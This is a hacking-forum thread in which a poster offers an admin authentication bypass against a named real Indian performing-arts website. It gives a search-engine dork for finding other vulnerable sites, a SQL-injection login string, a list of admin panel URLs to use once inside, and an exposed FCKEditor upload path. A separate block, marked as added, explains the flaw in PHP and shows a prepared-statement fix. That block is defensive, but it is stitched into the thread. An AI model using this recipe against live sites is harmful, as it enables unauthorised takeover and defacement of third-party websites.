Topic: Indian Performing Art Center Admin ByPass Vulnerability
KingSkrupellos
Comment: #1
Indian Performing Art Center Admin ByPass Vulnerability
08.06.2018 17:11
#################################################################################################

# Exploit Title : Copyright © 2014 Indian Performing Art Center Admin Control Panel ByPass Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 08/06/2018
# Vendor Homepage : ipacglobal.com
# Social Media Page : facebook.com/India-Performing-Arts-Center-249492318418992/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
* CWE-288 [ Authentication Bypass Using an Alternate Path or Channel ]
* CWE-592 [ Authentication Bypass Issues ]

#################################################################################################

# Google Dork : intext:''Copyright © 2014- All Rights Reserved Press| Indian Performing Art Center ::''

# Admin Panel Login Path : /admin

# Exploit : Login both for admin username and password as => '=''or'

# Possible Admin Control Panel Useable URL Paths :

/admin/editpages.php
/admin/editpages.php?id=1
/admin/editpages.php?id=2
/admin/editpages.php?id=3
/admin/editpages.php?id=4
/admin/editpages.php?id=5
/admin/editpages.php?id=6
/admin/editpages.php?id=7
/admin/editpages.php?id=8
/admin/editpages.php?id=9
/admin/editpages.php?id=10
/admin/editpages.php?id=11
/admin/editpages.php?id=12
/admin/addcategory.php
/admin/gallery.php?g_id=1
/admin/gallery.php?g_id=13
/admin/gallery.php?g_id=14
/admin/event.php
/admin/event.php?addcat=addcat
/admin/event.php?edit=edit&catid=1
/admin/videos.php
/admin/videos.php?addcat=addcat
/admin/videos.php?edit=edit&catid=1
/admin/fogana.php
/admin/fogana.php?edit=edit&fogana=1
/admin/addtestmoni.php
/admin/testimonials.php?edit=edit&catid=9

Add Image =>

/admin/addimage.php?action=add&g_id=1

Edit Image with Height and Width

/admin/edit.php?g_id=1&action=del&pid=1&height=200&width=350

PATH => /products/flash/....



#################################################################################################

FCKEditor Vulnerability [ You can select File ~ Image ~ Flash ~ Media ]

/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http.//TARGETSITE/admin/fckeditor/editor/filemanager/connectors/php/Fconnector.php

PATH => /admin/images/image/.....

PATH => /admin/images/file/....

#################################################################################################

# Example Site => ipacglobal.com

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
(This topic was last edited on 08.06.2018 at 17:13. Edited by: KingSkrupellos.)

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.
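Why a quote-bearing string such as the one in the post above can pass a login check, and the usual fix, as an added example that is not part of the original post and is not the site's code. The shape of the vulnerable query and the table and column names are assumptions, and an in-memory SQLite database (PDO sqlite driver required) stands in for the real backend.

```php
<?php
declare(strict_types=1);

// Constructed demo database; in-memory SQLite stands in for the real backend.
// Table and column names (admins, username, pass_hash) are hypothetical.
function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE admins (username TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');
    $ins = $db->prepare('INSERT INTO admins (username, pass_hash) VALUES (?, ?)');
    $ins->execute(['admin', password_hash('constructed-demo-password', PASSWORD_DEFAULT)]);
    return $db;
}

// BEFORE (assumed shape of the flaw): both form fields are pasted into the SQL
// text. A quote character in the input closes the string literal, and whatever
// follows is parsed as SQL operators instead of being compared as data.
// This function only builds the text; it is never executed here.
function unsafe_login_sql(string $user, string $pass): string {
    return "SELECT * FROM admins WHERE username = '$user' AND password = '$pass'";
}

// AFTER: the statement text is fixed and input travels only as a bound
// parameter. The password is verified against a stored hash in PHP, so no
// user-supplied value ever takes part in SQL parsing.
function safe_login(PDO $db, string $user, string $pass): bool {
    $st = $db->prepare('SELECT pass_hash FROM admins WHERE username = :u');
    $st->execute([':u' => $user]);
    $hash = $st->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

$db = demo_db();
$quoted = "'=''or'"; // the string quoted in the post above

// The built query no longer has the two-comparison structure the developer wrote.
echo unsafe_login_sql($quoted, $quoted), PHP_EOL;

// Bound as data, the same string is just a username that does not exist.
var_dump(safe_login($db, $quoted, $quoted));
var_dump(safe_login($db, 'admin', 'constructed-demo-password'));
```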



Meczup
Comment: #2
Re: Indian Performing Art Center Admin ByPass Vuln
08.06.2018 17:13
Thanks for your effort :)